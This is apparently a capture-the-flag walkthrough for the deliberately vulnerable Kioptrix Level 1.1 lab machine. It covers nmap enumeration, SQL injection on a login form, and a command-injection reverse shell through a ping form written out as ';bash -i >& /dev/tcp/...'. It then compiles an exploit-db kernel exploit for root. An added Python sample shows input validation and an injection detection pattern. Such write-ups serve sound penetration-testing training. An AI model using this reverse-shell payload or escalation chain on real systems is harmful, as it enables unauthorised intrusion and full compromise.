Kioptrix Level 1.1 (#2) Walkthrough

Enumeration

Start by scanning the machine with nmap:

nmap -sC -sV -oA nmap/Level2 192.168.43.215
# Nmap 7.80 scan initiated Thu May  7 09:13:13 2020 as: nmap -sC -sV -oA nmap/Level2 192.168.43.215
Nmap scan report for 192.168.43.215
Host is up (0.0012s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-05-07T10:04:36+00:00; -3h09m24s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:52:3C:FB (VMware)

Host script results:
|_clock-skew: -3h09m24s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May  7 09:14:28 2020 -- 1 IP address (1 host up) scanned in 75.51 seconds

SQL Injection

Port 80/tcp is open, so open the machine's address in a web browser.

The page shows a login form, and MySQL is running on the machine, so SQL injection against the login form is the first thing to try.

After logging in there is a form that pings a host; test it with our own machine's IP address.

Reverse Shell

Since the form passes our input to a system ping command, we can inject a reverse shell command into it and get a shell from the machine. First start a netcat listener on port 443.

Then take the bash reverse shell one-liner from pentestmonkey and enter it in the ping box, prefixed with a semicolon so that it runs as a second command after the ping:

;bash -i >& /dev/tcp/192.168.43.182/443 0>&1

After running it we get a shell over the reverse TCP connection. Next, we will try a kernel exploit.
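The ping form's weakness, and how to close it, as an added example that is not part of the original walkthrough or of the Kioptrix application (function names are assumed): the unsafe version splices user input into a shell string, so the `;` in the payload above ends the ping and starts a second command; the hardened version accepts only a parsed IPv4 address and passes it to ping as an argv element without a shell, and a small check flags shell metacharacters in submitted input for logging or a WAF rule.

```python
import ipaddress
import re
import subprocess

# Constructed sample inputs: a legitimate target and the payload shown above.
GOOD_TARGET = "192.168.43.182"
INJECTED_TARGET = ";bash -i >& /dev/tcp/192.168.43.182/443 0>&1"

# Characters with shell meaning that never belong in an IPv4 address.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\"'\n\r]")


def unsafe_shell_command(target: str) -> str:
    """How the vulnerable handler builds its command (assumed shape): the
    input is spliced into a string that /bin/sh parses, so ';' terminates
    the ping and everything after it runs as a second command."""
    return f"ping -c 3 {target}"


def build_ping_argv(target: str) -> list[str]:
    """Hardened version: accept only a syntactically valid IPv4 address and
    return an argv list to execute without a shell.  Metacharacters, a
    leading '-' (option injection) and hostnames are all rejected."""
    try:
        addr = ipaddress.IPv4Address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ping target: {target!r}") from exc
    return ["ping", "-c", "3", str(addr)]


def looks_like_injection(target: str) -> bool:
    """Detection hint for request logs: does the submitted target contain
    shell metacharacters?  A hit is worth an alert even if the input was
    rejected, because it shows someone probing the form."""
    return SHELL_META.search(target) is not None


def safe_ping(target: str) -> int:
    """Run ping with the validated argv; shell=False means no shell parses it."""
    argv = build_ping_argv(target)
    return subprocess.run(argv, check=False, capture_output=True).returncode


if __name__ == "__main__":
    print(unsafe_shell_command(INJECTED_TARGET))  # the second command is visible
    print(looks_like_injection(INJECTED_TARGET))  # True
    try:
        build_ping_argv(INJECTED_TARGET)
    except ValueError as err:
        print(err)
    print(build_ping_argv(GOOD_TARGET))
```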

Privilege Escalation

After some searching on Google, we find a suitable exploit on exploit-db.

First download the exploit to our machine, then serve it over HTTP with python -m SimpleHTTPServer.

On the victim, change to the /tmp directory and transfer the file there from our machine.

Then rename the file from 9542 to 9542.c so it has the .c extension, compile it with gcc 9542.c -o exploit, make it executable with chmod +x exploit, and run it with ./exploit.

Got root access! Congratulations!